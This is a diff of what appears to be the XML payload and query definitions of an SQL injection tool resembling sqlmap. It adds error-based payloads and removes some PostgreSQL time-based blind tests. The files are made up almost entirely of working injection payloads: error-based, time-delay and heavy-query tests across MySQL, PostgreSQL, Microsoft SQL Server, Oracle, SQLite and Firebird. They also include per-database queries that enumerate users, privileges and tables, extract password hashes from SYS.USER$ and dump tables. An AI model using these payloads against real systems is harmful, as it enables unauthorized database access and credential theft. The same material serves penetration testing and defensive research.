<risk>0</risk> <risk>0</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>1</where> <where>1</where>
<epayload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload>
<request> <request>
<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload> <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
</request> </request>
@ -718,6 +739,7 @@ Formats:
<risk>0</risk> <risk>0</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>1</where> <where>1</where>
<epayload>(CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC))</epayload>
<request> <request>
<payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload> <payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
</request> </request>
@ -736,6 +758,7 @@ Formats:
<risk>0</risk> <risk>0</risk>
<clause>3</clause> <clause>3</clause>
<where>1</where> <where>1</where>
<epayload>(CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')))</epayload>
<request> <request>
<payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload> <payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
</request> </request>
@ -754,6 +777,7 @@ Formats:
<risk>0</risk> <risk>0</risk>
<clause>3</clause> <clause>3</clause>
<where>1</where> <where>1</where>
<epayload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload>
<request> <request>
<payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload> <payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
</request> </request>
@ -772,6 +796,7 @@ Formats:
<risk>0</risk> <risk>0</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>3</where> <where>3</where>
<epayload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload>
<request> <request>
<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload> <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
</request> </request>
@ -791,6 +816,7 @@ Formats:
<risk>0</risk> <risk>0</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>3</where> <where>3</where>
<epayload>(CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC))</epayload>
<request> <request>
<payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload> <payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
</request> </request>
@ -809,6 +835,7 @@ Formats:
<risk>0</risk> <risk>0</risk>
<clause>3</clause> <clause>3</clause>
<where>3</where> <where>3</where>
<epayload>(CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')))</epayload>
<request> <request>
<payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload> <payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
</request> </request>
@ -827,6 +854,7 @@ Formats:
<risk>0</risk> <risk>0</risk>
<clause>3</clause> <clause>3</clause>
<where>3</where> <where>3</where>
<epayload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload>
<request> <request>
<payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload> <payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
</request> </request>
@ -1078,6 +1106,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<epayload>AND IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</epayload>
<request> <request>
<payload>AND SLEEP([SLEEPTIME])</payload> <payload>AND SLEEP([SLEEPTIME])</payload>
</request> </request>
@ -1097,6 +1126,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<epayload>AND IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</epayload>
<request> <request>
<payload>AND BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload> <payload>AND BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
</request> </request>
@ -1108,25 +1138,6 @@ Formats:
</details> </details>
</test> </test>
<test>
<title>PostgreSQL &gt; 8.1 AND time-based blind</title>
<stype>5</stype>
<level>1</level>
<risk>1</risk>
<clause>1</clause>
<where>1</where>
<request>
<payload>AND PG_SLEEP([SLEEPTIME])</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>PostgreSQL</dbms>
<dbms_version>&gt; 8.1</dbms_version>
</details>
</test>
<test> <test>
<title>SQLite &gt; 2.0 AND time-based blind</title> <title>SQLite &gt; 2.0 AND time-based blind</title>
<stype>5</stype> <stype>5</stype>
@ -1134,6 +1145,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<epayload></epayload>
<request> <request>
<payload>AND LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload> <payload>AND LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
</request> </request>
@ -1154,6 +1166,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<epayload></epayload>
<request> <request>
<payload>AND (COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload> <payload>AND (COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload>
</request> </request>
@ -1167,7 +1180,7 @@ Formats:
</test> </test>
<!-- <!--
NOTE: there is no way to perform this test against Microsoft SQL NOTE: there is no way to perform this test against Microsoft SQL
Server, Sybase, Oracle or PostgreSQL < 8.2 Server, Sybase, Oracle or PostgreSQL
--> -->
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB --> <!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
<!-- End of AND time-based blind tests --> <!-- End of AND time-based blind tests -->
@ -1181,6 +1194,7 @@ Formats:
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<epayload>OR IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</epayload>
<request> <request>
<payload>OR SLEEP([SLEEPTIME])</payload> <payload>OR SLEEP([SLEEPTIME])</payload>
</request> </request>
@ -1200,6 +1214,7 @@ Formats:
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<epayload>OR IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</epayload>
<request> <request>
<payload>OR BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload> <payload>OR BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
</request> </request>
@ -1211,25 +1226,6 @@ Formats:
</details> </details>
</test> </test>
<test>
<title>PostgreSQL &gt; 8.1 OR time-based blind</title>
<stype>5</stype>
<level>2</level>
<risk>3</risk>
<clause>1</clause>
<where>1</where>
<request>
<payload>OR PG_SLEEP([SLEEPTIME])</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>PostgreSQL</dbms>
<dbms_version>&gt; 8.1</dbms_version>
</details>
</test>
<test> <test>
<title>SQLite &gt; 2.0 OR time-based blind</title> <title>SQLite &gt; 2.0 OR time-based blind</title>
<stype>5</stype> <stype>5</stype>
@ -1237,6 +1233,7 @@ Formats:
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<epayload></epayload>
<request> <request>
<payload>OR LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload> <payload>OR LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
</request> </request>
@ -1257,6 +1254,7 @@ Formats:
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<epayload></epayload>
<request> <request>
<payload>OR (COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload> <payload>OR (COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload>
</request> </request>
@ -1270,7 +1268,7 @@ Formats:
</test> </test>
<!-- <!--
NOTE: there is no way to perform this test against Microsoft SQL NOTE: there is no way to perform this test against Microsoft SQL
Server, Sybase, Oracle or PostgreSQL < 8.2 Server, Sybase, Oracle or PostgreSQL
--> -->
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB --> <!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
<!-- End of OR time-based blind tests --> <!-- End of OR time-based blind tests -->


@ -24,7 +24,6 @@
<timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/> <timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/>
<substring query="MID((%s), %d, %d)"/> <substring query="MID((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/> <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
<error query="%s (SELECT %s FROM(SELECT COUNT(*),CONCAT(%s,(%s),%s,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)"/>
<inference query="AND ORD(MID((%s), %d, 1)) > %d"/> <inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
<banner query="VERSION()"/> <banner query="VERSION()"/>
<current_user query="CURRENT_USER()"/> <current_user query="CURRENT_USER()"/>
@ -74,84 +73,6 @@
</search_column> </search_column>
</dbms> </dbms>
<!-- Oracle -->
<dbms value="Oracle">
<cast query="CAST(%s AS VARCHAR(4000))"/>
<length query="LENGTH(%s)"/>
<isnull query="NVL(%s, ' ')"/>
<delimiter query="||"/>
<limit query="ROWNUM AS LIMIT %s) WHERE LIMIT"/>
<limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
<limitgroupstart/>
<limitgroupstop/>
<limitstring/>
<order query="ORDER BY %s ASC"/>
<count query="COUNT(%s)"/>
<comment query="--"/>
<timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d.00)"/>
<substring query="SUBSTR((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
<error query="%s %s=(SELECT UPPER(XMLType(CHR(60)||%s||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||%s||CHR(62))) FROM DUAL)"/>
<inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
<banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
<current_user query="SELECT USER FROM DUAL"/>
<current_db query="SELECT SYS.DATABASE_NAME FROM DUAL"/>
<!--
NOTE: in Oracle to check if the session user is DBA you can use:
SELECT USERENV('ISDBA') FROM DUAL
-->
<is_dba query="(SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE GRANTEE=USER AND GRANTED_ROLE='DBA')='DBA'"/>
<users>
<inband query="SELECT USERNAME FROM SYS.ALL_USERS ORDER BY 1"/>
<blind query="SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS"/>
</users>
<passwords>
<inband query="SELECT NAME, PASSWORD FROM SYS.USER$" condition="NAME"/>
<blind query="SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$ WHERE NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$ WHERE NAME='%s'"/>
</passwords>
<!--
NOTE: in Oracle to enumerate the privileges for the session user you can use:
SELECT * FROM SESSION_PRIVS
-->
<privileges>
<inband query="SELECT GRANTEE, PRIVILEGE FROM DBA_SYS_PRIVS" query2="SELECT USERNAME, PRIVILEGE FROM USER_SYS_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
<blind query="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM DBA_SYS_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM USER_SYS_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM DBA_SYS_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM USER_SYS_PRIVS WHERE USERNAME='%s'"/>
</privileges>
<!--
NOTE: in Oracle to enumerate the roles for the session user you can use:
SELECT * FROM SESSION_ROLES
-->
<roles>
<inband query="SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS" query2="SELECT USERNAME, GRANTED_ROLE FROM USER_ROLE_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
<blind query="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM USER_ROLE_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM USER_ROLE_PRIVS WHERE USERNAME='%s'"/>
</roles>
<!-- NOTE: in Oracle there is no query to enumerate DBMS databases. It is possible only through a STATUS request to the Oracle TNS Listener negotiating its protocol -->
<dbs/>
<tables>
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES" condition="TABLESPACE_NAME"/>
<blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME, ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'"/>
</tables>
<columns>
<inband query="SELECT COLUMN_NAME, DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
<blind query="SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
</columns>
<dump_table>
<inband query="SELECT %s FROM %s"/>
<blind query="SELECT %s FROM (SELECT %s, ROWNUM AS LIMIT FROM %s) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
</dump_table>
<search_db/>
<search_table>
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES WHERE " condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
<blind query="SELECT DISTINCT(TABLESPACE_NAME) FROM SYS.ALL_TABLES WHERE " query2="SELECT TABLE_NAME FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" count="SELECT COUNT(DISTINCT(TABLESPACE_NAME)) FROM SYS.ALL_TABLES WHERE " count2="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
</search_table>
<search_column>
<inband query="SELECT TABLE_NAME FROM SYS.ALL_TAB_COLUMNS WHERE " condition="COLUMN_NAME"/>
<blind query="" query2="SELECT DISTINCT(TABLE_NAME) FROM SYS.ALL_TAB_COLUMNS" count="" count2="SELECT COUNT(DISTINCT(TABLE_NAME)) FROM SYS.ALL_TAB_COLUMNS" condition="COLUMN_NAME"/>
</search_column>
</dbms>
<!-- PostgreSQL --> <!-- PostgreSQL -->
<dbms value="PostgreSQL"> <dbms value="PostgreSQL">
<cast query="CAST(%s AS CHARACTER(10000))"/> <cast query="CAST(%s AS CHARACTER(10000))"/>
@ -175,7 +96,6 @@
<timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/> <timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/>
<substring query="SUBSTR((%s)::text, %d, %d)"/> <substring query="SUBSTR((%s)::text, %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/> <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
<error query="%s %s=CAST(%s||(%s)::text||%s AS NUMERIC)"/>
<inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/> <inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
<banner query="SELECT VERSION()"/> <banner query="SELECT VERSION()"/>
<current_user query="SELECT CURRENT_USER"/> <current_user query="SELECT CURRENT_USER"/>
@ -242,7 +162,6 @@
<timedelay query="WAITFOR DELAY '0:0:%d'"/> <timedelay query="WAITFOR DELAY '0:0:%d'"/>
<substring query="SUBSTRING((%s), %d, %d)"/> <substring query="SUBSTRING((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/> <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
<error query="%s %s=CONVERT(INT,(%s+(%s)+%s))"/>
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/> <inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
<banner query="SELECT @@VERSION"/> <banner query="SELECT @@VERSION"/>
<current_user query="SELECT SYSTEM_USER"/> <current_user query="SELECT SYSTEM_USER"/>
@ -290,6 +209,83 @@
</search_column> </search_column>
</dbms> </dbms>
<!-- Oracle -->
<dbms value="Oracle">
<cast query="CAST(%s AS VARCHAR(4000))"/>
<length query="LENGTH(%s)"/>
<isnull query="NVL(%s, ' ')"/>
<delimiter query="||"/>
<limit query="ROWNUM AS LIMIT %s) WHERE LIMIT"/>
<limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
<limitgroupstart/>
<limitgroupstop/>
<limitstring/>
<order query="ORDER BY %s ASC"/>
<count query="COUNT(%s)"/>
<comment query="--"/>
<timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d.00)"/>
<substring query="SUBSTR((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
<inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
<banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
<current_user query="SELECT USER FROM DUAL"/>
<current_db query="SELECT SYS.DATABASE_NAME FROM DUAL"/>
<!--
NOTE: in Oracle to check if the session user is DBA you can use:
SELECT USERENV('ISDBA') FROM DUAL
-->
<is_dba query="(SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE GRANTEE=USER AND GRANTED_ROLE='DBA')='DBA'"/>
<users>
<inband query="SELECT USERNAME FROM SYS.ALL_USERS ORDER BY 1"/>
<blind query="SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS"/>
</users>
<passwords>
<inband query="SELECT NAME, PASSWORD FROM SYS.USER$" condition="NAME"/>
<blind query="SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$ WHERE NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$ WHERE NAME='%s'"/>
</passwords>
<!--
NOTE: in Oracle to enumerate the privileges for the session user you can use:
SELECT * FROM SESSION_PRIVS
-->
<privileges>
<inband query="SELECT GRANTEE, PRIVILEGE FROM DBA_SYS_PRIVS" query2="SELECT USERNAME, PRIVILEGE FROM USER_SYS_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
<blind query="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM DBA_SYS_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM USER_SYS_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM DBA_SYS_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM USER_SYS_PRIVS WHERE USERNAME='%s'"/>
</privileges>
<!--
NOTE: in Oracle to enumerate the roles for the session user you can use:
SELECT * FROM SESSION_ROLES
-->
<roles>
<inband query="SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS" query2="SELECT USERNAME, GRANTED_ROLE FROM USER_ROLE_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
<blind query="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM USER_ROLE_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM USER_ROLE_PRIVS WHERE USERNAME='%s'"/>
</roles>
<!-- NOTE: in Oracle there is no query to enumerate DBMS databases. It is possible only through a STATUS request to the Oracle TNS Listener negotiating its protocol -->
<dbs/>
<tables>
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES" condition="TABLESPACE_NAME"/>
<blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME, ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'"/>
</tables>
<columns>
<inband query="SELECT COLUMN_NAME, DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
<blind query="SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
</columns>
<dump_table>
<inband query="SELECT %s FROM %s"/>
<blind query="SELECT %s FROM (SELECT %s, ROWNUM AS LIMIT FROM %s) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
</dump_table>
<search_db/>
<search_table>
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES WHERE " condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
<blind query="SELECT DISTINCT(TABLESPACE_NAME) FROM SYS.ALL_TABLES WHERE " query2="SELECT TABLE_NAME FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" count="SELECT COUNT(DISTINCT(TABLESPACE_NAME)) FROM SYS.ALL_TABLES WHERE " count2="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
</search_table>
<search_column>
<inband query="SELECT TABLE_NAME FROM SYS.ALL_TAB_COLUMNS WHERE " condition="COLUMN_NAME"/>
<blind query="" query2="SELECT DISTINCT(TABLE_NAME) FROM SYS.ALL_TAB_COLUMNS" count="" count2="SELECT COUNT(DISTINCT(TABLE_NAME)) FROM SYS.ALL_TAB_COLUMNS" condition="COLUMN_NAME"/>
</search_column>
</dbms>
<!-- SQLite --> <!-- SQLite -->
